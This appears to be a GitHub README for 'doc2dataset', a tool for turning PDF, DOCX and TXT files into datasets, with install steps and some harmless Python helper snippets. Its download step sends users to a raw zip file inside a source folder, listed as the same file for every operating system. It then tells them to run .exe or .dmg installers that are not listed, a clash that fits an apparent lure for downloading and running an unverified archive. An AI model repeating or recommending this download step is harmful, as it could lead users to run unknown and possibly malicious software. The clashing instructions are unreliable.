
📄 Ingest documents into structured datasets for LLMs, ensuring numeric integrity and easy export across multiple frameworks with doc2dataset.


reisel-g/doc2dataset

🎉 doc2dataset - Effortless Document Generation for All

🚀 Getting Started

Welcome to doc2dataset! This application helps you generate datasets from documents easily. Follow these steps to get started.

🔗 Download Now

Download doc2dataset

📦 System Requirements

Before you download, ensure your computer meets these requirements:

  • Operating System: Windows 10 or later, macOS 10.15 or later, or Linux (any recent version)
  • RAM: At least 4GB recommended
  • Disk Space: 500MB of free space
  • Internet Connection: Required for downloads and updates
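The disk space and operating system requirements above can be checked with a short script before downloading. This is a minimal sketch using only the Python standard library; the function names are hypothetical and not part of doc2dataset. It checks the operating system family only, not its version, and it does not check RAM.

```python
import platform
import shutil

# Threshold taken from the requirements list above.
MIN_FREE_DISK_BYTES = 500 * 1024 * 1024  # 500MB


def has_enough_disk(path=".", required=MIN_FREE_DISK_BYTES):
    """Return True if the filesystem holding `path` has `required` bytes free."""
    return shutil.disk_usage(path).free >= required


def supported_os(system=None):
    """Return True for the three operating system families named above."""
    system = system or platform.system()
    return system in {"Windows", "Darwin", "Linux"}  # Darwin is macOS


if __name__ == "__main__":
    print("OS family supported:", supported_os())
    print("At least 500MB free:", has_enough_disk())
```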

📥 Download & Install

  1. Visit the Releases Page: Go to this page to download.

  2. Choose the Version: Locate the latest version of doc2dataset. You will see a list of files available for download.

  3. Select Your File: The same archive is currently listed for Windows, macOS, and Linux:

    • https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip
  4. Run the Installer:

    • Windows: Double-click the .exe file and follow the prompts to install.
    • macOS: Open the .dmg file and drag the app to your Applications folder.
    • Linux: Extract the downloaded doc2dataset_1.1.zip file and run the application.
  5. Launch the Application: After installation, open doc2dataset from your applications or start menu.
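If you prefer to script the extraction step, the sketch below unpacks an already downloaded archive with Python's standard `zipfile` module. The function name and the paths in the usage note are assumptions for illustration; the script does not download anything and makes no claim about what the archive contains.

```python
import zipfile
from pathlib import Path


def extract_archive(archive_path, dest_dir):
    """Extract a zip archive into dest_dir and return the archive member names."""
    dest = Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(archive_path) as archive:
        bad_member = archive.testzip()  # name of the first corrupt member, or None
        if bad_member is not None:
            raise ValueError(f"corrupt archive member: {bad_member}")
        archive.extractall(dest)
        return archive.namelist()
```

For example, `extract_archive("doc2dataset_1.1.zip", "doc2dataset")` would unpack the file into a `doc2dataset` folder next to it and return the list of extracted names, which is a quick way to see what the archive holds before running anything.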

🛠️ How to Use doc2dataset

Using doc2dataset is straightforward:

  1. Prepare Your Documents: Gather the documents you want to process. Ensure they are in a supported format (PDF, DOCX, or TXT).

  2. Open the Application: Launch doc2dataset.

  3. Select Your Files: Use the "Choose Files" button to select the documents you want to convert into a dataset.

  4. Set Parameters: Adjust any settings to meet your needs. You can set options such as:

    • Output format (CSV, JSON, etc.)
    • Include or exclude specific sections
    • Number of documents to process
  5. Start the Process: Click the "Generate Dataset" button. The application will begin processing your documents. A progress bar will show you how far along the process is.

  6. Access Your Dataset: Once completed, the application will provide a download link for your dataset file. Save it to your desired location.
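Step 1 can be partly automated. The sketch below sorts a list of file paths into supported and unsupported groups, using the three formats named above. It is an illustration only: the function name is hypothetical, and it checks the file extension rather than the file contents.

```python
from pathlib import Path

SUPPORTED_EXTENSIONS = {".pdf", ".docx", ".txt"}  # formats named in step 1


def split_by_support(paths):
    """Split paths into (supported, unsupported) lists by file extension."""
    supported, unsupported = [], []
    for path in map(Path, paths):
        if path.suffix.lower() in SUPPORTED_EXTENSIONS:
            supported.append(path)
        else:
            unsupported.append(path)
    return supported, unsupported


if __name__ == "__main__":
    ok, skipped = split_by_support(["report.PDF", "notes.txt", "scan.png"])
    print("ready to process:", [p.name for p in ok])
    print("unsupported:", [p.name for p in skipped])
```

The comparison is case-insensitive, so `report.PDF` counts as a PDF.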

📝 Features

  • Token Efficiency: Works with less data for effective results.
  • Multi-Framework Outputs: Easy integration with various machine learning frameworks.
  • Numeric Integrity: Leverages NumGuard to maintain data accuracy.
  • User-Friendly Interface: Designed for ease of use, even for non-technical users.
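To make the idea of numeric integrity concrete, the sketch below reports numbers that appear in a source document but not in the exported dataset. It is not NumGuard and does not reflect how NumGuard works, which this README does not describe. It is a hypothetical spot check that compares unsigned digit strings literally, so it ignores signs and thousands separators, and treats `12.50` and `12.5` as different.

```python
import re
from collections import Counter

# Unsigned integers and decimals such as "340" or "12.5".
NUMBER_PATTERN = re.compile(r"\d+(?:\.\d+)?")


def missing_numbers(source_text, dataset_text):
    """Return numbers that occur more often in source_text than in dataset_text."""
    source_counts = Counter(NUMBER_PATTERN.findall(source_text))
    dataset_counts = Counter(NUMBER_PATTERN.findall(dataset_text))
    # Counter subtraction keeps only the positive differences.
    return sorted((source_counts - dataset_counts).elements())


if __name__ == "__main__":
    source = "Revenue rose 12.5% to 340 in 2023."
    exported = "revenue_growth: 12.5, revenue: 340"
    print(missing_numbers(source, exported))
```

An empty result means every number found in the source also appears in the export at least as many times.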

💡 Tips for Optimal Use

  • Batch Processing: Process multiple documents at once to save time.
  • Regular Updates: Check for updates often to ensure you have the latest features and improvements.
  • Explore Settings: Familiarize yourself with the settings for optimal performance based on your specific needs.

🛠️ Troubleshooting

If you encounter issues:

  • Installation Problems: Ensure your system meets the requirements listed above.
  • File Format Errors: Verify that your documents are in a supported format.
  • Performance Issues: Close other applications to free up memory.
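For file format errors, a file's extension may not match its contents. The sketch below is a rough, hypothetical check, not part of doc2dataset: it looks for the `%PDF-` header in PDF files, for a `word/document.xml` entry in the zip container of DOCX files, and it assumes TXT files should decode as UTF-8, which is an assumption about the application's input handling.

```python
import zipfile
from pathlib import Path


def looks_like_declared_format(path):
    """Return True if the file content is plausible for its extension."""
    path = Path(path)
    suffix = path.suffix.lower()
    if suffix == ".pdf":
        with path.open("rb") as handle:
            return handle.read(5) == b"%PDF-"
    if suffix == ".docx":
        # A DOCX file is a zip container holding word/document.xml.
        if not zipfile.is_zipfile(path):
            return False
        with zipfile.ZipFile(path) as archive:
            return "word/document.xml" in archive.namelist()
    if suffix == ".txt":
        try:
            path.read_text(encoding="utf-8")  # assumption: UTF-8 text
            return True
        except UnicodeDecodeError:
            return False
    return False  # extension not in the supported list
```

A `False` result for a file with a supported extension suggests the file was renamed or is damaged, and re-exporting it from its original application is a reasonable next step.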

📞 Support

If you have questions or need assistance, feel free to reach out. You can contact the developer on GitHub or visit the discussion forum linked in the repository.

🌐 Additional Resources

For more information on features and updates, visit our official documentation. You can also explore the community discussions for shared tips and experiences.

Thank you for choosing doc2dataset! We hope it simplifies your data generation tasks.
